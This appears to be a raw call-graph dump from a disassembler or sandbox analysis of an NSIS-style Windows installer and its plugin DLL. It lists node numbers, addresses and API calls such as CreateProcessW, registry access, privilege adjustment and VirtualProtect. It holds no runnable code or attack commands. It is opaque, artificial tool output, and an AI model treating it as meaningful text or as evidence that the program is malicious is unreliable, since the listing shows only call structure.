5369->5372 5373 403f03 5369->5373 5370->5359 5374 404042 5371->5374 5372->5384 5377 403f0f GetDlgItem 5373->5377 5392 403f7a 5373->5392 5374->5363 5378 404046 SendMessageW 5374->5378 5375 40140b 2 API calls 5375->5381 5376 4042d0 DestroyWindow EndDialog 5376->5422 5382 403f22 SendMessageW IsWindowEnabled 5377->5382 5383 403f3f 5377->5383 5378->5384 5379 4043ac 8 API calls 5379->5384 5380 4042ff ShowWindow 5380->5384 5381->5375 5381->5376 5381->5384 5385 4063d2 17 API calls 5381->5385 5395 404345 18 API calls 5381->5395 5397 404345 18 API calls 5381->5397 5413 404210 DestroyWindow 5381->5413 5382->5383 5382->5384 5386 403f4c 5383->5386 5387 403f93 SendMessageW 5383->5387 5388 403f5f 5383->5388 5396 403f44 5383->5396 5385->5381 5386->5387 5386->5396 5387->5392 5390 403f67 5388->5390 5391 403f7c 5388->5391 5389 40431e SendMessageW 5389->5392 5393 40140b 2 API calls 5390->5393 5394 40140b 2 API calls 5391->5394 5392->5379 5393->5396 5394->5396 5395->5381 5396->5389 5396->5392 5398 4040f7 GetDlgItem 5397->5398 5399 404114 ShowWindow EnableWindow 5398->5399 5400 40410c 5398->5400 5423 404367 EnableWindow 5399->5423 5400->5399 5402 40413e EnableWindow 5407 404152 5402->5407 5403 404157 GetSystemMenu EnableMenuItem SendMessageW 5404 404187 SendMessageW 5403->5404 5403->5407 5404->5407 5406 403e4d 18 API calls 5406->5407 5407->5403 5407->5406 5424 40437a SendMessageW 5407->5424 5425 4063b0 lstrcpynW 5407->5425 5409 4041b6 lstrlenW 5410 4063d2 17 API calls 5409->5410 5411 4041cc SetWindowTextW 5410->5411 5412 401389 2 API calls 5411->5412 5412->5381 5414 40422a CreateDialogParamW 5413->5414 5413->5422 5415 40425d 5414->5415 5414->5422 5416 404345 18 API calls 5415->5416 5417 404268 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 5416->5417 5418 401389 2 API calls 5417->5418 5419 4042ae 5418->5419 5419->5384 5420 4042b6 ShowWindow 5419->5420 5421 404391 SendMessageW 5420->5421 5421->5422 5422->5380 5422->5384 5423->5402 5424->5407 5425->5409 5426 401ced 5427 402c15 17 API calls 5426->5427 5428 401cf3 IsWindow 5427->5428 5429 401a20 5428->5429 4962 40176f 4963 402c37 17 API calls 4962->4963 4964 401776 4963->4964 4965 401796 4964->4965 4966 40179e 4964->4966 5002 4063b0 lstrcpynW 4965->5002 5003 4063b0 lstrcpynW 4966->5003 4969 40179c 4973 406644 5 API calls 4969->4973 4970 4017a9 4971 405c81 3 API calls 4970->4971 4972 4017af lstrcatW 4971->4972 4972->4969 4978 4017bb 4973->4978 4974 4066f3 2 API calls 4974->4978 4975 4017f7 4976 405e7d 2 API calls 4975->4976 4976->4978 4978->4974 4978->4975 4979 4017cd CompareFileTime 4978->4979 4980 40188d 4978->4980 4987 4063d2 17 API calls 4978->4987 4992 4063b0 lstrcpynW 4978->4992 4997 405a12 MessageBoxIndirectW 4978->4997 4998 401864 4978->4998 5001 405ea2 GetFileAttributesW CreateFileW 4978->5001 4979->4978 4981 405414 24 API calls 4980->4981 4983 401897 4981->4983 4982 405414 24 API calls 5000 401879 4982->5000 4984 4031ba 44 API calls 4983->4984 4985 4018aa 4984->4985 4986 4018be SetFileTime 4985->4986 4988 4018d0 CloseHandle 4985->4988 4986->4988 4987->4978 4989 4018e1 4988->4989 4988->5000 4990 4018e6 4989->4990 4991 4018f9 4989->4991 4993 4063d2 17 API calls 4990->4993 4994 4063d2 17 API calls 4991->4994 4992->4978 4995 4018ee lstrcatW 4993->4995 4996 401901 4994->4996 4995->4996 4999 405a12 MessageBoxIndirectW 4996->4999 4997->4978 4998->4982 4998->5000 4999->5000 5001->4978 5002->4969 5003->4970 5437 402570 5438 402c37 17 API calls 5437->5438 5439 402577 5438->5439 5442 405ea2 GetFileAttributesW CreateFileW 5439->5442 5441 402583 5442->5441 5004 401b71 5005 401bc2 5004->5005 5006 401b7e 5004->5006 5008 401bc7 5005->5008 5009 401bec GlobalAlloc 5005->5009 5007 401c07 5006->5007 5012 401b95 5006->5012 5010 4063d2 17 API calls 5007->5010 5022 4022f1 5007->5022 5008->5022 5025 4063b0 lstrcpynW 5008->5025 5011 4063d2 17 API calls 5009->5011 5014 4022eb 5010->5014 5011->5007 5023 4063b0 lstrcpynW 5012->5023 5018 405a12 MessageBoxIndirectW 5014->5018 5016 401bd9 GlobalFree 5016->5022 5017 401ba4 5024 4063b0 lstrcpynW 5017->5024 5018->5022 5020 401bb3 5026 4063b0 lstrcpynW 5020->5026 5023->5017 5024->5020 5025->5016 5026->5022 5027 4024f2 5028 402c77 17 API calls 5027->5028 5029 4024fc 5028->5029 5030 402c15 17 API calls 5029->5030 5031 402505 5030->5031 5032 402521 RegEnumKeyW 5031->5032 5033 40252d RegEnumValueW 5031->5033 5036 402885 5031->5036 5034 402549 RegCloseKey 5032->5034 5033->5034 5035 402542 5033->5035 5034->5036 5035->5034 5450 401a72 5451 402c15 17 API calls 5450->5451 5452 401a78 5451->5452 5453 402c15 17 API calls 5452->5453 5454 401a20 5453->5454 5455 401573 5456 401583 ShowWindow 5455->5456 5457 40158c 5455->5457 5456->5457 5458 40159a ShowWindow 5457->5458 5459 402abf 5457->5459 5458->5459 5460 4014f5 SetForegroundWindow 5461 402abf 5460->5461 5462 100016b6 5463 100016e5 5462->5463 5464 10001b18 22 API calls 5463->5464 5465 100016ec 5464->5465 5466 100016f3 5465->5466 5467 100016ff 5465->5467 5468 10001272 2 API calls 5466->5468 5469 10001726 5467->5469 5470 10001709 5467->5470 5478 100016fd 5468->5478 5472 10001750 5469->5472 5473 1000172c 5469->5473 5471 1000153d 3 API calls 5470->5471 5475 1000170e 5471->5475 5474 1000153d 3 API calls 5472->5474 5476 100015b4 3 API calls 5473->5476 5474->5478 5479 100015b4 3 API calls 5475->5479 5477 10001731 5476->5477 5480 10001272 2 API calls 5477->5480 5481 10001714 5479->5481 5482 10001737 GlobalFree 5480->5482 5483 10001272 2 API calls 5481->5483 5482->5478 5484 1000174b GlobalFree 5482->5484 5485 1000171a GlobalFree 5483->5485 5484->5478 5485->5478 5486 401e77 5487 402c37 17 API calls 5486->5487 5488 401e7d 5487->5488 5489 402c37 17 API calls 5488->5489 5490 401e86 5489->5490 5491 402c37 17 API calls 5490->5491 5492 401e8f 5491->5492 5493 402c37 17 API calls 5492->5493 5494 401e98 5493->5494 5495 401423 24 API calls 5494->5495 5496 401e9f 5495->5496 5503 4059d8 ShellExecuteExW 5496->5503 5498 401ee1 5499 40683b 5 API calls 5498->5499 5501 402885 5498->5501 5500 401efb CloseHandle 5499->5500 5500->5501 5503->5498 5504 406e77 5508 40693e 5504->5508 5505 4072a9 5506 4069c8 GlobalAlloc 5506->5505 5506->5508 5507 4069bf GlobalFree 5507->5506 5508->5505 5508->5506 5508->5507 5508->5508 5509 406a36 GlobalFree 5508->5509 5510 406a3f GlobalAlloc 5508->5510 5509->5510 5510->5505 5510->5508 5511 10002238 5512 10002296 5511->5512 5513 100022cc 5511->5513 5512->5513 5514 100022a8 GlobalAlloc 5512->5514 5514->5512 5515 40167b 5516 402c37 17 API calls 5515->5516 5517 401682 5516->5517 5518 402c37 17 API calls 5517->5518 5519 40168b 5518->5519 5520 402c37 17 API calls 5519->5520 5521 401694 MoveFileW 5520->5521 5522 4016a7 5521->5522 5528 4016a0 5521->5528 5523 40224a 5522->5523 5524 4066f3 2 API calls 5522->5524 5526 4016b6 5524->5526 5525 401423 24 API calls 5525->5523 5526->5523 5527 406176 36 API calls 5526->5527 5527->5528 5528->5525 5529 403a7c 5530 403a87 5529->5530 5531 403a8b 5530->5531 5532 403a8e GlobalAlloc 5530->5532 5532->5531 5533 1000103d 5534 1000101b 5 API calls 5533->5534 5535 10001056 5534->5535 5049 40247e 5050 402c77 17 API calls 5049->5050 5051 402488 5050->5051 5052 402c37 17 API calls 5051->5052 5053 402491 5052->5053 5054 40249c RegQueryValueExW 5053->5054 5058 402885 5053->5058 5055 4024c2 RegCloseKey 5054->5055 5056 4024bc 5054->5056 5055->5058 5056->5055 5060 4062f7 wsprintfW 5056->5060 5060->5055 5536 4020fe 5537 402c37 17 API calls 5536->5537 5538 402105 5537->5538 5539 402c37 17 API calls 5538->5539 5540 40210f 5539->5540 5541 402c37 17 API calls 5540->5541 5542 402119 5541->5542 5543 402c37 17 API calls 5542->5543 5544 402123 5543->5544 5545 402c37 17 API calls 5544->5545 5546 40212d 5545->5546 5547 40216c CoCreateInstance 5546->5547 5548 402c37 17 API calls 5546->5548 5551 40218b 5547->5551 5548->5547 5549 401423 24 API calls 5550 40224a 5549->5550 5551->5549 5551->5550 5552 4019ff 5553 402c37 17 API calls 5552->5553 5554 401a06 5553->5554 5555 402c37 17 API calls 5554->5555 5556 401a0f 5555->5556 5557 401a16 lstrcmpiW 5556->5557 5558 401a28 lstrcmpW 5556->5558 5559 401a1c 5557->5559 5558->5559 4111 401f00 4126 402c37 4111->4126 4120 401f2b 4122 401f30 4120->4122 4123 401f3b 4120->4123 4121 402885 4151 4062f7 wsprintfW 4122->4151 4125 401f39 CloseHandle 4123->4125 4125->4121 4127 402c43 4126->4127 4152 4063d2 4127->4152 4130 401f06 4132 405414 4130->4132 4133 40542f 4132->4133 4141 401f10 4132->4141 4134 40544b lstrlenW 4133->4134 4135 4063d2 17 API calls 4133->4135 4136 405474 4134->4136 4137 405459 lstrlenW 4134->4137 4135->4134 4139 405487 4136->4139 4140 40547a SetWindowTextW 4136->4140 4138 40546b lstrcatW 4137->4138 4137->4141 4138->4136 4139->4141 4142 40548d SendMessageW SendMessageW SendMessageW 4139->4142 4140->4139 4143 405995 CreateProcessW 4141->4143 4142->4141 4144 401f16 4143->4144 4145 4059c8 CloseHandle 4143->4145 4144->4121 4144->4125 4146 40683b WaitForSingleObject 4144->4146 4145->4144 4147 406855 4146->4147 4148 406867 GetExitCodeProcess 4147->4148 4194 4067c6 4147->4194 4148->4120 4151->4125 4153 4063df 4152->4153 4154 40662a 4153->4154 4157 4065f8 lstrlenW 4153->4157 4158 4063d2 10 API calls 4153->4158 4161 40650d GetSystemDirectoryW 4153->4161 4163 406520 GetWindowsDirectoryW 4153->4163 4164 406644 5 API calls 4153->4164 4165 4063d2 10 API calls 4153->4165 4166 40659b lstrcatW 4153->4166 4167 406554 SHGetSpecialFolderLocation 4153->4167 4178 40627e 4153->4178 4183 4062f7 wsprintfW 4153->4183 4184 4063b0 lstrcpynW 4153->4184 4155 402c64 4154->4155 4185 4063b0 lstrcpynW 4154->4185 4155->4130 4169 406644 4155->4169 4157->4153 4158->4157 4161->4153 4163->4153 4164->4153 4165->4153 4166->4153 4167->4153 4168 40656c SHGetPathFromIDListW CoTaskMemFree 4167->4168 4168->4153 4175 406651 4169->4175 4170 4066c7 4171 4066cc CharPrevW 4170->4171 4173 4066ed 4170->4173 4171->4170 4172 4066ba CharNextW 4172->4170 4172->4175 4173->4130 4175->4170 4175->4172 4176 4066a6 CharNextW 4175->4176 4177 4066b5 CharNextW 4175->4177 4190 405cae 4175->4190 4176->4175 4177->4172 4186 40621d 4178->4186 4181 4062b2 RegQueryValueExW RegCloseKey 4182 4062e2 4181->4182 4182->4153 4183->4153 4184->4153 4185->4155 4187 40622c 4186->4187 4188 406230 4187->4188 4189 406235 RegOpenKeyExW 4187->4189 4188->4181 4188->4182 4189->4188 4191 405cb4 4190->4191 4192 405cca 4191->4192 4193 405cbb CharNextW 4191->4193 4192->4175 4193->4191 4195 4067e3 PeekMessageW 4194->4195 4196 4067f3 WaitForSingleObject 4195->4196 4197 4067d9 DispatchMessageW 4195->4197 4196->4147 4197->4195 5560 401000 5561 401037 BeginPaint GetClientRect 5560->5561 5562 40100c DefWindowProcW 5560->5562 5564 4010f3 5561->5564 5565 401179 5562->5565 5566 401073 CreateBrushIndirect FillRect DeleteObject 5564->5566 5567 4010fc 5564->5567 5566->5564 5568 401102 CreateFontIndirectW 5567->5568 5569 401167 EndPaint 5567->5569 5568->5569 5570 401112 6 API calls 5568->5570 5569->5565 5570->5569 4372 100027c2 4373 10002812 4372->4373 4374 100027d2 VirtualProtect 4372->4374 4374->4373 5571 401503 5572 40150b 5571->5572 5574 40151e 5571->5574 5573 402c15 17 API calls 5572->5573 5573->5574 4414 402306 4415 40230e 4414->4415 4418 402314 4414->4418 4416 402c37 17 API calls 4415->4416 4416->4418 4417 402322 4420 402c37 17 API calls 4417->4420 4422 402330 4417->4422 4418->4417 4419 402c37 17 API calls 4418->4419 4419->4417 4420->4422 4421 402c37 17 API calls 4423 402339 WritePrivateProfileStringW 4421->4423 4422->4421 5582 401f86 5583 402c37 17 API calls 5582->5583 5584 401f8d 5583->5584 5585 40678a 5 API calls 5584->5585 5586 401f9c 5585->5586 5587 401fb8 GlobalAlloc 5586->5587 5588 402020 5586->5588 5587->5588 5589 401fcc 5587->5589 5590 40678a 5 API calls 5589->5590 5591 401fd3 5590->5591 5592 40678a 5 API calls 5591->5592 5593 401fdd 5592->5593 5593->5588 5597 4062f7 wsprintfW 5593->5597 5595 402012 5598 4062f7 wsprintfW 5595->5598 5597->5595 5598->5588 4424 402388 4425 402390 4424->4425 4426 4023bb 4424->4426 4440 402c77 4425->4440 4428 402c37 17 API calls 4426->4428 4430 4023c2 4428->4430 4436 402cf5 4430->4436 4431 4023a1 4433 402c37 17 API calls 4431->4433 4435 4023a8 RegDeleteValueW RegCloseKey 4433->4435 4434 4023cf 4435->4434 4437 402d0b 4436->4437 4438 402d21 4437->4438 4445 402d2a 4437->4445 4438->4434 4441 402c37 17 API calls 4440->4441 4442 402c8e 4441->4442 4443 40621d RegOpenKeyExW 4442->4443 4444 402397 4443->4444 4444->4431 4444->4434 4446 40621d RegOpenKeyExW 4445->4446 4447 402d58 4446->4447 4448 402dd0 4447->4448 4453 402d5c 4447->4453 4448->4438 4449 402d7e RegEnumKeyW 4450 402d95 RegCloseKey 4449->4450 4449->4453 4451 40678a 5 API calls 4450->4451 4454 402da5 4451->4454 4452 402db6 RegCloseKey 4452->4448 4453->4449 4453->4450 4453->4452 4455 402d2a 6 API calls 4453->4455 4456 402dc4 RegDeleteKeyW 4454->4456 4457 402da9 4454->4457 4455->4453 4456->4448 4457->4448 5599 405388 5600 405398 5599->5600 5601 4053ac 5599->5601 5602 4053f5 5600->5602 5603 40539e 5600->5603 5604 4053b4 IsWindowVisible 5601->5604 5610 4053cb 5601->5610 5605 4053fa CallWindowProcW 5602->5605 5606 404391 SendMessageW 5603->5606 5604->5602 5607 4053c1 5604->5607 5608 4053a8 5605->5608 5606->5608 5612 404cde SendMessageW 5607->5612 5610->5605 5617 404d5e 5610->5617 5613 404d01 GetMessagePos ScreenToClient SendMessageW 5612->5613 5614 404d3d SendMessageW 5612->5614 5615 404d35 5613->5615 5616 404d3a 5613->5616 5614->5615 5615->5610 5616->5614 5626 4063b0 lstrcpynW 5617->5626 5619 404d71 5627 4062f7 wsprintfW 5619->5627 5621 404d7b 5622 40140b 2 API calls 5621->5622 5623 404d84 5622->5623 5628 4063b0 lstrcpynW 5623->5628 5625 404d8b 5625->5602 5626->5619 5627->5621 5628->5625 4467 403489 SetErrorMode GetVersion 4468 4034c8 4467->4468 4469 4034ce 4467->4469 4470 40678a 5 API calls 4468->4470 4471 40671a 3 API calls 4469->4471 4470->4469 4472 4034e4 lstrlenA 4471->4472 4472->4469 4473 4034f4 4472->4473 4474 40678a 5 API calls 4473->4474 4475 4034fb 4474->4475 4476 40678a 5 API calls 4475->4476 4477 403502 4476->4477 4478 40678a 5 API calls 4477->4478 4479 40350e #17 OleInitialize SHGetFileInfoW 4478->4479 4558 4063b0 lstrcpynW 4479->4558 4482 40355a GetCommandLineW 4559 4063b0 lstrcpynW 4482->4559 4484 40356c GetModuleHandleW 4485 403584 4484->4485 4486 405cae CharNextW 4485->4486 4487 403593 CharNextW 4486->4487 4488 4036bd GetTempPathW 4487->4488 4498 4035ac 4487->4498 4560 403458 4488->4560 4490 4036d5 4491 4036d9 GetWindowsDirectoryW lstrcatW 4490->4491 4492 40372f DeleteFileW 4490->4492 4493 403458 12 API calls 4491->4493 4570 402f14 GetTickCount GetModuleFileNameW 4492->4570 4496 4036f5 4493->4496 4494 405cae CharNextW 4494->4498 4496->4492 4499 4036f9 GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 4496->4499 4497 403743 4504 4037e6 4497->4504 4508 405cae CharNextW 4497->4508 4553 4037f6 4497->4553 4498->4494 4501 4036a8 4498->4501 4503 4036a6 4498->4503 4502 403458 12 API calls 4499->4502 4657 4063b0 lstrcpynW 4501->4657 4506 403727 4502->4506 4503->4488 4600 403abe 4504->4600 4506->4492 4506->4553 4521 403762 4508->4521 4510 403930 4513 4039b4 ExitProcess 4510->4513 4514 403938 GetCurrentProcess OpenProcessToken 4510->4514 4511 403810 4669 405a12 4511->4669 4519 403950 LookupPrivilegeValueW AdjustTokenPrivileges 4514->4519 4520 403984 4514->4520 4516 4037c0 4522 405d89 18 API calls 4516->4522 4517 403826 4523 40597d 5 API calls 4517->4523 4519->4520 4524 40678a 5 API calls 4520->4524 4521->4516 4521->4517 4525 4037cc 4522->4525 4526 40382b lstrcatW 4523->4526 4527 40398b 4524->4527 4525->4553 4658 4063b0 lstrcpynW 4525->4658 4528 403847 lstrcatW lstrcmpiW 4526->4528 4529 40383c lstrcatW 4526->4529 4530 4039a0 ExitWindowsEx 4527->4530 4531 4039ad 4527->4531 4533 403863 4528->4533 4528->4553 4529->4528 4530->4513 4530->4531 4675 40140b 4531->4675 4536 403868 4533->4536 4537 40386f 4533->4537 4535 4037db 4659 4063b0 lstrcpynW 4535->4659 4540 4058e3 4 API calls 4536->4540 4538 405960 2 API calls 4537->4538 4541 403874 SetCurrentDirectoryW 4538->4541 4542 40386d 4540->4542 4543 403884 4541->4543 4544 40388f 4541->4544 4542->4541 4673 4063b0 lstrcpynW 4543->4673 4674 4063b0 lstrcpynW 4544->4674 4547 4063d2 17 API calls 4548 4038ce DeleteFileW 4547->4548 4549 4038db CopyFileW 4548->4549 4554 40389d 4548->4554 4549->4554 4550 403924 4551 406176 36 API calls 4550->4551 4551->4553 4552 406176 36 API calls 4552->4554 4660 4039cc 4553->4660 4554->4547 4554->4550 4554->4552 4555 4063d2 17 API calls 4554->4555 4556 405995 2 API calls 4554->4556 4557 40390f CloseHandle 4554->4557 4555->4554 4556->4554 4557->4554 4558->4482 4559->4484 4561 406644 5 API calls 4560->4561 4562 403464 4561->4562 4563 40346e 4562->4563 4564 405c81 3 API calls 4562->4564 4563->4490 4565 403476 4564->4565 4566 405960 2 API calls 4565->4566 4567 40347c 4566->4567 4678 405ed1 4567->4678 4682 405ea2 GetFileAttributesW CreateFileW 4570->4682 4572 402f57 4599 402f64 4572->4599 4683 4063b0 lstrcpynW 4572->4683 4574 402f7a 4575 405ccd 2 API calls 4574->4575 4576 402f80 4575->4576 4684 4063b0 lstrcpynW 4576->4684 4578 402f8b GetFileSize 4579 40308c 4578->4579 4597 402fa2 4578->4597 4685 402e72 4579->4685 4583 403127 4586 402e72 32 API calls 4583->4586 4584 4030cf GlobalAlloc 4585 4030e6 4584->4585 4590 405ed1 2 API calls 4585->4590 4586->4599 4588 4030b0 4591 40342b ReadFile 4588->4591 4589 402e72 32 API calls 4589->4597 4593 4030f7 CreateFileW 4590->4593 4592 4030bb 4591->4592 4592->4584 4592->4599 4594 403131 4593->4594 4593->4599 4700 403441 SetFilePointer 4594->4700 4596 40313f 4701 4031ba 4596->4701 4597->4579 4597->4583 4597->4589 4597->4599 4716 40342b 4597->4716 4599->4497 4601 40678a 5 API calls 4600->4601 4602 403ad2 4601->4602 4603 403ad8 4602->4603 4604 403aea 4602->4604 4752 4062f7 wsprintfW 4603->4752 4605 40627e 3 API calls 4604->4605 4606 403b1a 4605->4606 4607 403b39 lstrcatW 4606->4607 4609 40627e 3 API calls 4606->4609 4610 403ae8 4607->4610 4609->4607 4744 403d94 4610->4744 4613 405d89 18 API calls 4614 403b6b 4613->4614 4615 403bff 4614->4615 4617 40627e 3 API calls 4614->4617 4616 405d89 18 API calls 4615->4616 4618 403c05 4616->4618 4620 403b9d 4617->4620 4619 403c15 LoadImageW 4618->4619 4621 4063d2 17 API calls 4618->4621 4622 403cbb 4619->4622 4623 403c3c RegisterClassW 4619->4623 4620->4615 4624 403bbe lstrlenW 4620->4624 4627 405cae CharNextW 4620->4627 4621->4619 4626 40140b 2 API calls 4622->4626 4625 403c72 SystemParametersInfoW CreateWindowExW 4623->4625 4656 403cc5 4623->4656 4628 403bf2 4624->4628 4629 403bcc lstrcmpiW 4624->4629 4625->4622 4630 403cc1 4626->4630 4631 403bbb 4627->4631 4633 405c81 3 API calls 4628->4633 4629->4628 4632 403bdc GetFileAttributesW 4629->4632 4635 403d94 18 API calls 4630->4635 4630->4656 4631->4624 4634 403be8 4632->4634 4636 403bf8 4633->4636 4634->4628 4637 405ccd 2 API calls 4634->4637 4638 403cd2 4635->4638 4753 4063b0 lstrcpynW 4636->4753 4637->4628 4640 403d61 4638->4640 4641 403cde ShowWindow 4638->4641 4754 4054e7 OleInitialize 4640->4754 4643 40671a 3 API calls 4641->4643 4645 403cf6 4643->4645 4644 403d67 4646 403d83 4644->4646 4647 403d6b 4644->4647 4648 403d04 GetClassInfoW 4645->4648 4650 40671a 3 API calls 4645->4650 4649 40140b 2 API calls 4646->4649 4654 40140b 2 API calls 4647->4654 4647->4656 4651 403d18 GetClassInfoW RegisterClassW 4648->4651 4652 403d2e DialogBoxParamW 4648->4652 4649->4656 4650->4648 4651->4652 4653 40140b 2 API calls 4652->4653 4655 403d56 4653->4655 4654->4656 4655->4656 4656->4553 4657->4503 4658->4535 4659->4504 4661 4039e7 4660->4661 4662 4039dd CloseHandle 4660->4662 4663 4039f1 CloseHandle 4661->4663 4664 4039fb 4661->4664 4662->4661 4663->4664 4772 403a29 4664->4772 4667 405abe 67 API calls 4668 4037ff OleUninitialize 4667->4668 4668->4510 4668->4511 4670 405a27 4669->4670 4671 40381e ExitProcess 4670->4671 4672 405a3b MessageBoxIndirectW 4670->4672 4672->4671 4673->4544 4674->4554 4676 401389 2 API calls 4675->4676 4677 401420 4676->4677 4677->4513 4679 405ede GetTickCount GetTempFileNameW 4678->4679 4680 405f14 4679->4680 4681 403487 4679->4681 4680->4679 4680->4681 4681->4490 4682->4572 4683->4574 4684->4578 4686 402e83 4685->4686 4687 402e9b 4685->4687 4688 402e93 4686->4688 4689 402e8c DestroyWindow 4686->4689 4690 402ea3 4687->4690 4691 402eab GetTickCount 4687->4691 4688->4584 4688->4599 4719 403441 SetFilePointer 4688->4719 4689->4688 4693 4067c6 2 API calls 4690->4693 4691->4688 4692 402eb9 4691->4692 4694 402ec1 4692->4694 4695 402eee CreateDialogParamW ShowWindow 4692->4695 4693->4688 4694->4688 4720 402e56 4694->4720 4695->4688 4697 402ecf wsprintfW 4698 405414 24 API calls 4697->4698 4699 402eec 4698->4699 4699->4688 4700->4596 4702 4031e5 4701->4702 4703 4031c9 SetFilePointer 4701->4703 4723 4032c2 GetTickCount 4702->4723 4703->4702 4706 405f25 ReadFile 4707 403205 4706->4707 4708 4032c2 42 API calls 4707->4708 4715 403282 4707->4715 4709 40321c 4708->4709 4710 403288 ReadFile 4709->4710 4713 40322b 4709->4713 4709->4715 4710->4715 4712 405f25 ReadFile 4712->4713 4713->4712 4714 405f54 WriteFile 4713->4714 4713->4715 4714->4713 4715->4599 4717 405f25 ReadFile 4716->4717 4718 40343e 4717->4718 4718->4597 4719->4588 4721 402e65 4720->4721 4722 402e67 MulDiv 4720->4722 4721->4722 4722->4697 4724 4032f0 4723->4724 4725 40341a 4723->4725 4736 403441 SetFilePointer 4724->4736 4726 402e72 32 API calls 4725->4726 4732 4031ec 4726->4732 4728 4032fb SetFilePointer 4734 403320 4728->4734 4729 40342b ReadFile 4729->4734 4731 402e72 32 API calls 4731->4734 4732->4706 4732->4715 4733 405f54 WriteFile 4733->4734 4734->4729 4734->4731 4734->4732 4734->4733 4735 4033fb SetFilePointer 4734->4735 4737 40690b 4734->4737 4735->4725 4736->4728 4738 406930 4737->4738 4741 406938 4737->4741 4738->4734 4739 4069c8 GlobalAlloc 4739->4738 4739->4741 4740 4069bf GlobalFree 4740->4739 4741->4738 4741->4739 4741->4740 4742 406a36 GlobalFree 4741->4742 4743 406a3f GlobalAlloc 4741->4743 4742->4743 4743->4738 4743->4741 4745 403da8 4744->4745 4761 4062f7 wsprintfW 4745->4761 4747 403e19 4762 403e4d 4747->4762 4749 403b49 4749->4613 4750 403e1e 4750->4749 4751 4063d2 17 API calls 4750->4751 4751->4750 4752->4610 4753->4615 4765 404391 4754->4765 4756 40550a 4760 405531 4756->4760 4768 401389 4756->4768 4757 404391 SendMessageW 4758 405543 OleUninitialize 4757->4758 4758->4644 4760->4757 4761->4747 4763 4063d2 17 API calls 4762->4763 4764 403e5b SetWindowTextW 4763->4764 4764->4750 4766 4043a9 4765->4766 4767 40439a SendMessageW 4765->4767 4766->4756 4767->4766 4770 401390 4768->4770 4769 4013fe 4769->4756 4770->4769 4771 4013cb MulDiv SendMessageW 4770->4771 4771->4770 4773 403a37 4772->4773 4774 403a00 4773->4774 4775 403a3c FreeLibrary GlobalFree 4773->4775 4774->4667 4775->4774 4775->4775 4776 401389 4778 401390 4776->4778 4777 4013fe 4778->4777 4779 4013cb MulDiv SendMessageW 4778->4779 4779->4778 5629 40190c 5630 401943 5629->5630 5631 402c37 17 API calls 5630->5631 5632 401948 5631->5632 5633 405abe 67 API calls 5632->5633 5634 401951 5633->5634 5635 401d0e 5636 402c15 17 API calls 5635->5636 5637 401d15 5636->5637 5638 402c15 17 API calls 5637->5638 5639 401d21 GetDlgItem 5638->5639 5640 40258c 5639->5640 5641 1000164f 5642 10001516 GlobalFree 5641->5642 5644 10001667 5642->5644 5643 100016ad GlobalFree 5644->5643 5645 10001682 5644->5645 5646 10001699 VirtualFree 5644->5646 5645->5643 5646->5643 5647 40190f 5648 402c37 17 API calls 5647->5648 5649 401916 5648->5649 5650 405a12 MessageBoxIndirectW 5649->5650 5651 40191f 5650->5651 5652 404d90 GetDlgItem GetDlgItem 5653 404de2 7 API calls 5652->5653 5661 404ffb 5652->5661 5654 404e85 DeleteObject 5653->5654 5655 404e78 SendMessageW 5653->5655 5656 404e8e 5654->5656 5655->5654 5658 404ec5 5656->5658 5660 4063d2 17 API calls 5656->5660 5657 4050df 5659 40518b 5657->5659 5668 405138 SendMessageW 5657->5668 5695 404fee 5657->5695 5662 404345 18 API calls 5658->5662 5664 405195 SendMessageW 5659->5664 5665 40519d 5659->5665 5666 404ea7 SendMessageW SendMessageW 5660->5666 5661->5657 5663 40506c 5661->5663 5671 404cde 5 API calls 5661->5671 5667 404ed9 5662->5667 5663->5657 5670 4050d1 SendMessageW 5663->5670 5664->5665 5676 4051b6 5665->5676 5677 4051af ImageList_Destroy 5665->5677 5688 4051c6 5665->5688 5666->5656 5672 404345 18 API calls 5667->5672 5674 40514d SendMessageW 5668->5674 5668->5695 5669 4043ac 8 API calls 5675 405381 5669->5675 5670->5657 5671->5663 5683 404ee7 5672->5683 5673 405335 5681 405347 ShowWindow GetDlgItem ShowWindow 5673->5681 5673->5695 5679 405160 5674->5679 5680 4051bf GlobalFree 5676->5680 5676->5688 5677->5676 5678 404fbc GetWindowLongW SetWindowLongW 5682 404fd5 5678->5682 5689 405171 SendMessageW 5679->5689 5680->5688 5681->5695 5684 404ff3 5682->5684 5685 404fdb ShowWindow 5682->5685 5683->5678 5687 404f37 SendMessageW 5683->5687 5690 404fb6 5683->5690 5692 404f73 SendMessageW 5683->5692 5693 404f84 SendMessageW 5683->5693 5704 40437a SendMessageW 5684->5704 5703 40437a SendMessageW 5685->5703 5687->5683 5688->5673 5694 404d5e 4 API calls 5688->5694 5699 405201 5688->5699 5689->5659 5690->5678 5690->5682 5692->5683 5693->5683 5694->5699 5695->5669 5696 40530b InvalidateRect 5696->5673 5697 405321 5696->5697 5705 404c99 5697->5705 5698 40522f SendMessageW 5702 405245 5698->5702 5699->5698 5699->5702 5701 4052b9 SendMessageW SendMessageW 5701->5702 5702->5696 5702->5701 5703->5695 5704->5661 5708 404bd0 5705->5708 5707 404cae 5707->5673 5709 404be9 5708->5709 5710 4063d2 17 API calls 5709->5710 5711 404c4d 5710->5711 5712 4063d2 17 API calls 5711->5712 5713 404c58 5712->5713 5714 4063d2 17 API calls 5713->5714 5715 404c6e lstrlenW wsprintfW SetDlgItemTextW 5714->5715 5715->5707 5716 401491 5717 405414 24 API calls 5716->5717 5718 401498 5717->5718 5719 402592 5720 4025c1 5719->5720 5721 4025a6 5719->5721 5723 4025f5 5720->5723 5724 4025c6 5720->5724 5722 402c15 17 API calls 5721->5722 5729 4025ad 5722->5729 5726 402c37 17 API calls 5723->5726 5725 402c37 17 API calls 5724->5725 5727 4025cd WideCharToMultiByte lstrlenA 5725->5727 5728 4025fc lstrlenW 5726->5728 5727->5729 5728->5729 5731 405f83 5 API calls 5729->5731 5732 40263f 5729->5732 5733 402629 5729->5733 5730 405f54 WriteFile 5730->5732 5731->5733 5733->5730 5733->5732 5734 404493 lstrlenW 5735 4044b2 5734->5735 5736 4044b4 WideCharToMultiByte 5734->5736 5735->5736 5737 404814 5738 404840 5737->5738 5739 404851 5737->5739 5798 4059f6 GetDlgItemTextW 5738->5798 5741 40485d GetDlgItem 5739->5741 5746 4048bc 5739->5746 5743 404871 5741->5743 5742 40484b 5745 406644 5 API calls 5742->5745 5749 404885 SetWindowTextW 5743->5749 5754 405d2c 4 API calls 5743->5754 5744 4049a0 5747 404b4f 5744->5747 5800 4059f6 GetDlgItemTextW 5744->5800 